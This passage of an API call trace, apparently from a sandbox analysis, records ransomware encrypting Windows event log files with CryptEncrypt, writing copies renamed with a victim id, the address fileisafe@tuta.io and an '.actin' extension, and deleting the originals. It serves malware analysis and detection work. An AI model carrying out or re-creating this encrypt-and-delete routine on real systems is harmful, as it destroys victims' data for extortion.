(lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0061.008] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0061.008] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0061.008] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0061.008] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0061.008] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72180) returned 1 [0061.008] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.008] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0061.010] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0061.010] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0061.012] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f80) returned 1 [0061.012] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.012] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0061.012] CryptDestroyKey (hKey=0xf71f80) returned 1 [0061.012] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0061.012] CryptDestroyKey (hKey=0xf72180) returned 1 [0061.012] CloseHandle (hObject=0x324) returned 1 [0061.012] CloseHandle (hObject=0x300) returned 1 [0061.014] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 1 [0061.015] SetEvent (hEvent=0x2e8) returned 1 [0061.015] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0061.015] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0061.016] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0061.016] CloseHandle (hObject=0x300) returned 1 [0061.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 0x20 [0061.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0061.016] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0061.016] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0061.016] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0061.016] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0061.017] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0061.017] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.017] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0061.018] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0061.019] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0061.020] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72140) returned 1 [0061.020] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.020] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0061.020] CryptDestroyKey (hKey=0xf72140) returned 1 [0061.020] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0061.021] CryptDestroyKey (hKey=0xf71b00) returned 1 [0061.021] CloseHandle (hObject=0x300) returned 1 [0061.021] CloseHandle (hObject=0x324) returned 1 [0061.023] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 1 [0061.024] SetEvent (hEvent=0x2e8) returned 1 [0061.024] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0061.024] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0061.026] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1118208) returned 1 [0061.026] CloseHandle (hObject=0x324) returned 1 [0061.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 0x20 [0061.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0061.027] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0061.027] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0061.027] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0061.027] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0061.027] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72140) returned 1 [0061.027] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.027] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x110100, lpOverlapped=0x0) returned 1 [0061.440] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x110100, dwBufLen=0x110100 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x110100) returned 1 [0061.442] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x110100, lpOverlapped=0x0) returned 1 [0061.462] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xf00, lpOverlapped=0x0) returned 1 [0061.462] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xf10, dwBufLen=0xf10 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xf10) returned 1 [0061.462] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf10, lpOverlapped=0x0) returned 1 [0061.462] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d40) returned 1 [0061.462] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0061.462] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0061.462] CryptDestroyKey (hKey=0xf71d40) returned 1 [0061.462] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0061.462] CryptDestroyKey (hKey=0xf72140) returned 1 [0061.462] CloseHandle (hObject=0x324) returned 1 [0061.462] CloseHandle (hObject=0x300) returned 1 [0062.128] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx")) returned 1 [0062.130] SetEvent (hEvent=0x2e8) returned 1 [0062.130] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.130] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.132] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.132] CloseHandle (hObject=0x300) returned 1 [0062.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 0x20 [0062.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.133] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.133] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.133] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.133] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.133] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c80) returned 1 [0062.133] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.133] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.135] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.135] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.137] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e80) returned 1 [0062.137] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.137] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0062.137] CryptDestroyKey (hKey=0xf71e80) returned 1 [0062.137] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0062.137] CryptDestroyKey (hKey=0xf71c80) returned 1 [0062.137] CloseHandle (hObject=0x300) returned 1 [0062.137] CloseHandle (hObject=0x328) returned 1 [0062.139] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 1 [0062.140] SetEvent (hEvent=0x2e8) returned 1 [0062.140] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.140] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.140] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.140] CloseHandle (hObject=0x328) returned 1 [0062.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 0x20 [0062.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.141] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.141] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.141] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.141] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.141] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0062.141] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.142] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.143] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.143] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.145] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c00) returned 1 [0062.145] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.145] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0062.145] CryptDestroyKey (hKey=0xf71c00) returned 1 [0062.145] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0062.145] CryptDestroyKey (hKey=0xf71b00) returned 1 [0062.145] CloseHandle (hObject=0x328) returned 1 [0062.145] CloseHandle (hObject=0x300) returned 1 [0062.147] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 1 [0062.149] SetEvent (hEvent=0x2e8) returned 1 [0062.149] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.149] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.149] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.150] CloseHandle (hObject=0x300) returned 1 [0062.150] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 0x20 [0062.150] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.150] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.150] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.150] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.150] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.150] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0062.150] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.150] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.475] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.475] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.477] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0062.477] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.477] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, 